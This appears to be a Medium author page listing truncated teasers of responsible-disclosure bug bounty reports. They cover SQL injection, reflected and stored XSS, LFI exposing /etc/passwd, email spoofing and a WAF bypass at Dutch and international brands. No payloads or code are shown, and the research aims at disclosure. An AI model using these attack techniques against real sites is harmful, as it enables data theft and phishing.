Proof of concept. The username of the database user starts with ‘hema’.

Background
These days almost every website uses a database. A server application will formulate a query that is send to the database whenever a visitor requests data from the site. The programming language used in those queries is often SQL. When constructing the database query a server application needs to consider the access levels of the requesting user; only data should be returned that the user has access to.

But what if there is a flaw somewhere in this process that allows you to manipulate the query that is send to the database? You may end up with thousands of…


Proof of concept. Above the browser. Below a private slack channel displaying the credentials.

Background
Reflected XSS bugs are great fun to find; they are everywhere and the impact can be big if the injected payload is carefully crafted.

Today we will try to find a Reflected XSS bug and craft a custom payload for it. We will run into certain restrictions and find good workarounds.

Hema.nl
One of the most indispensable brands in the Netherlands is HEMA. Hema is famous for its worst (sausage), their appeltaart (apple pie) and their variety stores that are nearly everywhere in The Netherlands.


Proof of concept

Background
With a 60% market share WordPress is the most used CMS at this moment. Out of the box WordPress is just a blog. But by installing some plugins you’re able to convert it into a webshop, a crowd funding platform or even a mind reader.

Everyone can create and publish a WordPress plugin, there is no quality control, all you have are the plugin reviews from other users. …


Proof of concept

Background
Previously we discussed XSS, open redirect bugs and unrestricted file uploads. Today we will focus on email content spoofing.

Phishing someone is way more easy if we are able to send emails from the servers of a well known brand. The email looks legitimate, is digitally signed by the sending domain and due to that it won’t be flagged as spam or phishing. Perfect.

IKEA.com
As mentioned in our previous bug report, IKEA is a nice brand with a proper responsible disclosure statement. So we’re safe to help them find bugs, maybe even in exchange for a reward ;-)!


Proof of concept

Background
Previously we discussed a Local File Inclusion bug at IKEA.com, the bug was quite complicated and showed us that you have to think out of the box in order to exploit it.

This time we will learn how a relative simple and easy to spot bug can have a high impact; a potential data leak of customer data.

Plenty of high profile brands use Salesforce for their Customer Relationship Management (CRM); it’s perfect for customer care support. Furthermore it’s real easy to implement their software on your own website by using their API.

IKEA.com As mentioned in our previous…


Proof of concept

Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl

Background
In my previous report we learned more about a special type of the persistent XSS attack; the unvalidated oEmbed attack. This attack allows us to inject our HTML and javascript code by manipulating the oEmbed functionality.

oEmbed is an open format designed to allow embedding content from a website into another website. Almost all of the media rich platforms support the oEmbed standard. For example you can easily add a Vimeo video to your Wordpress blog


Proof of concept

Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl

Background
In one of our previous reports we learned more about reflected XSS; the downside of this attack is that we need to trick an user in visiting a prepared URL.

But what if we can store our javascript code inside a page itself?

The impact will be much larger; no special urls involved and no XSS auditors ruining our game. We call this a stored or persistent XSS attack. As you may remember, we had success…


Proof of concept

Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl

Background
With a local file inclusion (LFI) attack you trick the server into sharing its private files. Think of the configuration, log and source code files of the website. Sometimes it can even lead to Remote Code Execution. LFI attacks are therefore considered to be high impact.

Most of the LFI attacks are caused by code that dynamically loads images or other files. If the requested filename or path is not properly validated it will serve you…


Proof of concept

Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl

Background
As we learned from previous reports, XSS attacks can have a high impact; you are able to steal cookies, attack the browser of a visitor or use it to phish for login credentials.

Today we will learn more about a reflected XSS attack in Adobe Experience Manager (AEM) that bypasses the Web Application Firewall (WAF), it results in a fully working phishing login.

Philips As always, we need to find a proper target for our attack…


Proof of concept (contents of the server file /etc/passwd are loaded into the offer description field)

Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl

Background
In the previous reports we learned more about executing code in the browser of a visitor; reflected XSS and stored XSS. Furthermore we had a quick look at misconfigured server settings and open redirects.

Today we will take a closer look at stealing private files from a server.

Picking a target As always we need to have a good target. One of the biggest ecommerce websites in the Netherlands is Bol.com. The way they handled my…

Jonathan Bouman

Medical doctor / Web developer / Security researcher - https://Protozoan.nl

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store